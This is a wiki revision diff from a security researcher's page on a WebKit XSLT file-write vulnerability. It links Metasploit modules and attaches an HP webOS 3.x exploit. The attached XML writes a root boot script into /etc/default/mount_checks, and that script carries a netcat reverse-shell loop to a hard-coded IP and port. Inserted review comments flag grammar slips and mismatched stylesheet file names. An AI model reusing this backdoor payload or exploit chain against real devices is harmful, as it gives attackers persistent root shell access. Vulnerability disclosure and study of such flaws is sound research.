Changes for page Application_Webkit

Last modified by Nicolas Gregoire on 2012/01/14 17:48

From version 6.1
edited by Nicolas Gregoire
on 2012/01/13 23:57
Change comment: Deletion of attachment xslt2root.xml
To version 9.1
edited by Nicolas Gregoire
on 2012/01/14 00:30
Change comment: Upload new image ipad-tmp-owned.png

Details

Page properties
Content
... ... @@ -28,7 +28,7 @@
28 28  
29 29  PoC included on the [[libxslt>>Engine_libxslt]] page demonstrate the vulnerability.
30 30  
31 -== Exploits ==
31 +== Meatsploit ==
32 32  
33 33  Two modules are included in Metasploit :
34 34  
... ... @@ -35,7 +35,9 @@
35 35  * a [[auxiliary>>http://www.metasploit.com/modules/auxiliary/server/webkit_xslt_dropper||rel="__blank"]] working on any non-sandboxed non-patched Webkit device
36 36  * an [[exploit>>http://www.metasploit.com/modules/exploit/windows/browser/safari_xslt_output||rel="__blank"]] plugin targeting Safari users with Admin privileges (because of the MOF trick)
37 37  
38 -An exploit for HP webOS is attached. This exploit drops a backdoor executed with root privileges at boot time :
38 +== HP webOS 3.x ==
39 39  
40 -* XML contains the payload : destination file name + file content. A reverse-shell based on netcat is added to the script
41 -* XSL reads the XML file and create the requested file on disk
40 +An exploit for HP webOS 3.x was developed. This exploit drops a backdoor which is later executed with root privileges at boot time. The exploit is composed of two files :
41 +
42 +* [[webos-root-backdoor.xml>>attach:webos-root-backdoor.xml]] contains the configurable data (name and content of the destination file) and a processing instruction trigger the XSLT code
43 +* [[webos-root-backdoor.xsl>>attach:webos-root-backdoor.xsl]] reads the XML file and create the requested file on disk. This version overwrites a script located in /etc/default/ with a version including a reverse-shell based on netcat
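Review bot: grammar in the two new bullets: "a processing instruction trigger the XSLT code" should read "triggers", and "reads the XML file and create the requested file" should read "creates". The link target of the new `[[webos-root-backdoor.xsl>>attach:webos-root-backdoor.xsl]]` bullet should also be checked, since only webos-root-backdoor.xml and ipad-tmp-owned.png appear among the attachments added in this revision; if the stylesheet was not uploaded in the same change, the link is dangling.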
ipad-tmp-owned.png
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +11.9 KB
Content
webos-root-backdoor.xml
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +1.7 KB
Content
... ... @@ -1,0 +1,54 @@
1 +<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
2 +<?xml-stylesheet type="text/xsl" href="xslt2root.xsl"?>
3 +<exploit><location>/etc/default/mount_checks</location><content><![CDATA[# -*- mode: conf; -*-
4 +
5 +# Backdoor, by Nicolas Gregoire / Agarri
6 +IP="192.168.2.89"
7 +PORT="4444"
8 +
9 +MKNOD="/bin/mknod"
10 +NC="/usr/bin/nc"
11 +FIFO="/tmp/.a"
12 +
13 +( $MKNOD $FIFO p; while true; do { sleep 1; $NC $IP $PORT < $FIFO | /bin/sh &> $FIFO ; } done ; rm $FIFO ) &
14 +# End backdoor
15 +
16 +
17 +# Set this to save a file across reboots to indictate on boot that
18 +# umount happened correctly (and that, e.g. battery wasn't pulled)
19 +MOUNT_STAMP=/var/umount.stamp
20 +# tags used in MOUNT_STAMP
21 +REASON_MARK=reason
22 +CLEAN_UMOUNT_MARK=date
23 +
24 +# name of system property holding true/false based on presence of
25 +# $MOUNT_STAMP. Ignored if MOUNT_STAMP not set; must be defined
26 +# otherwise
27 +MOUNT_PROPERTY=last_umount_clean
28 +
29 +# file that contains 1 if / should be remounted rw, 0 otherwise
30 +REMOUNT_TOKEN="/etc/.rootfs_RW"
31 +
32 +# If an fsck or reformat of /media/internal was required on boot, set
33 +# this property.
34 +MEDIA_FIX_PROPERTY=media_fixed_how
35 +
36 +WIPE_FLAGS_DIR=/var/.flags
37 +WIPE_FLAGS_FILE=$WIPE_FLAGS_DIR/on_mount
38 +WIPE_PROGRESS=/var/.sought_blocks
39 +
40 +# MMC_PROTECT_OPTS=-f
41 +MMC_PROTECT_OPTS=""
42 +MMC_PROTECT_DISABLED=1
43 +mmc_boot_update() {
44 + if which mmc_protect >/dev/null && test -z "$MMC_PROTECT_DISABLED" ; then
45 + BOOT_DEV=$(sed 's,.*root=\(/dev/[^ ]*\) .*,\1,' < /proc/cmdline)
46 + ON_OFF=1 # on by default
47 + if [ -f "$REMOUNT_TOKEN" -a "$(cat $REMOUNT_TOKEN)" = "1" ]; then
48 + ON_OFF=0
49 + fi
50 + mmc_protect $MMC_PROTECT_OPTS -D "$BOOT_DEV" -p $ON_OFF
51 + fi
52 +}
53 +]]></content></exploit>
54 +
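Review bot: the xml-stylesheet processing instruction on line 2 references href="xslt2root.xsl", while the page text names the companion stylesheet webos-root-backdoor.xsl and the earlier change comment records xslt2root.xml being deleted; the reference and the documented file name disagree, so one name should be used consistently in both places. Read defensively, the dropped content is the mount_checks configuration with a netcat reverse-shell block and a hard-coded IP/port prepended, written to /etc/default/mount_checks; a modification like this to a boot-time configuration file is exactly what file-integrity monitoring of /etc/default/, or a comparison against the shipped version of the file, would surface.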